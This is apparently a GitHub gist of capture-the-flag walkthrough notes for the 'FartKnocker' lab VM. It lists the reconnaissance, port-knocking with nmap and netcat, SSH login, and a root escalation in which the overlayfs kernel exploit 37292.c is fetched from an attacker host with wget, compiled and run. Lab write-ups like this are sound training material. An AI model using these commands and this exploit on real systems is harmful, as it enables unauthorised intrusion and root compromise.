Skip to content

Instantly share code, notes, and snippets.

@SecurityIsIllusion

SecurityIsIllusion/FartKnocker

Created October 30, 2017 14:10
Show Gist options
  • Save SecurityIsIllusion/01ff3c256134ed8409765e164a83e2b1 to your computer and use it in GitHub Desktop.
Save SecurityIsIllusion/01ff3c256134ed8409765e164a83e2b1 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
FartKnocker
netdiscover -r 192.168.43.0/24
nmap 192.168.43.3
PORT STATE SERVICE
80/tcp open http
sparta
192.168.43.3
open pcap in wireshark
tcp.port == 80 || udp.port == 80
7000
8000
9000
7000
8000
9000
8888
port knocking
for i in 7000 8000 9000 7000 8000 9000 8888;do nmap -Pn 192.168.43.3 -p $i; done;
netcat 192.168.43.3 7000
netcat 192.168.43.3 8000
netcat 192.168.43.3 9000
netcat 192.168.43.3 8888
/burgerworld/
analyze pcap in wireshark
follow tcp stream on port 8080
MMMMMMM MMMMMMH
HMMMMM:::::::.MMMMMMMMMM:::::.TMM
MMMI:::::::::::::::::::MMH::::::::TM
MMIi::::::::::::.:::::::::::::::::::::MMMM
MT::::.::::::::::::::::::::::::::::::.::=T.IMMM
MMMi:::::::::::::::::::::::::::::::::::::::::::MT)MM
MMMI.:::::::::::::::::::::::::::::::::::::::::::.:::M= MM
XMXi::::::::::::::::::::::.:::::::::::::::::::::::::::::::=MM
MMi::::::::::::::::::::::::::::::::::::::::::::::::::.::..:=MMM
MM:MMT:::::::::.:::::::::::::::::.:::::::::::::::::::::::::::MiMM
MMM::::::::::::::::::.::::::::::::::::::::::::::.::::::::::.TM.MM
MMi::::::::::::::.::::::::::::::::::::::::::::::::::::::.:::.:: M
MM:::.::::::::::::::::::::::::::::::::.:.:::::::::::::::::::::: XM
MM:MT::.::::::::::::::::::::::::::::::::::::::::::::::::::::::::::XM
IMM:::.::::::::::::::::::::::::::::::::::: :::::::::::::::::::::::.=M
MM::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: :::M
XMT:::::::::::::::::::::: ::::::::::::::::: : ::::::::::::::::::: iM
MiMi:::::::::: :::::::::::::::::::::::::::::::: ::::::::::::::.:IM
M::::::HH::::::::::::::::::::::::::::::::::::::::::::::::::::: M
MT:::::iM::::::::Hi:iXH:::ii::XH:::::::::::::.::::::::::::::.:.M
MX:::::iMX:i::::iMi:iMH::XH::Mi:::::::::::::::::::::::::::::: M
Mii::::HMH:::::iMH::MH=:MM=TMi::::::::::::::::::::::::::::::MM
MMMMMMMMMMMXTi:MMHi:HMMIMMMMii::::::::::::::::::::::::::::XM
XXOXMMT:. ::T= :IMMMMMMM=iXMii:::::::::::::::::::::::::: MM
MMMH:::.:::::::.::::.::::.:XMi::::::::::::::::::::::::::MM
XMM::.:.:..::..:.:.::.:.::: ::XMi::::::::::::::::::::::::MX
XMMT::::.:.::.::::.::.::::::::.::XH:::::::::::::::::::::: M
HMX::...:..::..:.:.::::::..... :::XX::::::::::::::.:::::. M
MM:::....:::::.::::::..:::::.:..:::HX::::::::::::::::::::=M
MX::::::::::::::::::::::..::::.:..::X::::::::::::::::::::IM
XMI.. .:.::....:..::::.:: ::...::.:.MH:::::::::::::::::.: M
MM:. ::..::....::.::::::....:.:...:..MT::. ::::::::: :..IM
MM=:::::.::.:::::..::::.: .::..::..::Mi:::::::::::::::::: MM
MMI:::...: .::..::::::.:::::::.::::TM:::::::::::::::::::=MO
MH.: .::::.::.. .:::::iLMXX=::::.:.Mi::::::: ::::::::::.MM
MX:.:..:: .:.:.:.: :MMM:::..:::::.HM:::: :::::::::::::.MM
MM:::...::....: ::IMT:::.:...:.::.MT::::::: ::::::::: MM
M=::..::::..:::MM:i:..::.:...: ::M:::: ::: ::::::::::MI
MH::: :.:.: MMMM=:::.:.:...:....iM::: :::::: ::::::LM
MMMMT.::. ::TM:::::..::::::::.::.IM::::HH:::::::::::.MO
MM:LM::T:MT.:: .......:....:.:: TMMiXMT.MH:::.::::.:M=
M:. :::MMi:::MMMM=::::::.::..::=MMMMMMXMH:::.:::::MM
XMI: :..::=MX :M::.......:...:::.MXTHM MH:::.: :.XM
MM XMMI IM M ................:: :MIIM:::::::MMO
MMXXMILM .ML.= :.:::....:.:..::.:..:::MMT:::::TMM
MXMLMMMT::.:...:........ ....::.:.=.MMMM:::::MM
MHM=:: :.:::...::::.:...:.....:: =MMM==Mi::::M
MM=:::.......:.:.::.:.::...:.: :: . ::=M:: MM
MMi:=XMMMi::::...:::::.::.:::::::::..: ::Mi:=MT
MM=:I:: :iMH==:::::.::.:::::::::::::::.::MT:XMT
MT=:=MMMMMMM=HM::::.::::::MMT=Mi::::::..:::MI=MM
M ::::::.=I= .MX:..: ::::.::MX::::.:::.:. .XMMM
M:MMMMMMM=.:::: ::.::...:.MMIM::.:::.::..::::M
M=:: : ::::.==XMMM:XMMM=:::.::.:.::::.M
M=.IMMM )X M MMMMMM=:::..::..:::.::M
MM X MMM:MMMMMMMMM=:::.:.:.. .:.::::M
MIMMMMMMMMMMMMMMI::::::::.:::.:...:.:M
MMMMMMMMMMMMMX:. .:..::....:...:::.:iM
MMMMMMMMMMI::::::.:.::...:....:.....:.:=M
MMMMMMMMMI:::::.:.. :.::.::..........:..:..:M
M=: :..::..::.........::.......::.:.....: M
MMMi::::::.:.:==MMMMMMMMMT:.:.:::..:::..: OM
MM=::..: OMMMM MMMT:::....:.::: :M
M=::::MM MMI:::........:OM
MMMMM MMH:::..::MMMMMM
MMMMMMMMMMMMMMM
CAN YOU UNDERSTAND MY MESSAGE?!
eins drei drei sieben
1 3 3 7
netcat 192.168.43.3 1
netcat 192.168.43.3 3
netcat 192.168.43.3 3
netcat 192.168.43.3 7
netcat 192.168.43.3 1337
/iamcornholio/
http://192.168.43.3/iamcornholio/
T3BlbiB1cCBTU0g6IDg4ODggOTk5OSA3Nzc3IDY2NjYK
echo T3BlbiB1cCBTU0g6IDg4ODggOTk5OSA3Nzc3IDY2NjYK | base64 -d
Open up SSH: 8888 9999 7777 6666
nc 192.168.43.3 8888
nc 192.168.43.3 9999
nc 192.168.43.3 7777
nc 192.168.43.3 6666
nmap 192.168.43.3
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
ssh 192.168.43.3
############################################
# CONGRATS! YOU HAVE OPENED THE SSH SERVER #
# USERNAME: butthead #
# PASSWORD: nachosrule #
############################################
ssh [email protected]
connection closed for split second
ssh [email protected] /bin/sh
ls
nachos
whoami
butthead
id
uid=1001(butthead) gid=1001(butthead) groups=1001(butthead)
uname -a
Linux Huhuhhhhhuhuhhh 3.13.0-46-generic #76-Ubuntu SMP Thu Feb 26 18:52:49 UTC 2015 i686 i686 i686 GNU/Linux
searchsploit Linux 3.13.0
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Privilege Escalation | linux/local/37292.c
cp /usr/share/exploitdb/platforms/linux/local/37292.c /var/www/html/
wget http://192.168.43.4/37292.c
chmod 777 37292.c
gcc 37292.c -o 37292
./37292
id
uid=0(root) gid=0(root) groups=0(root),1001(butthead)
# cd /root
# ls
SECRETZ
# file SECRETZ
SECRETZ: ASCII text
# cat SECRETZ
You have done a great job, if you can see this, please shoot me an email
and let me know that you have beat this box!
SECRET = "LIVE LONG AND PROSPER, REST IN PEACE MR. SPOCK"
[email protected]
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment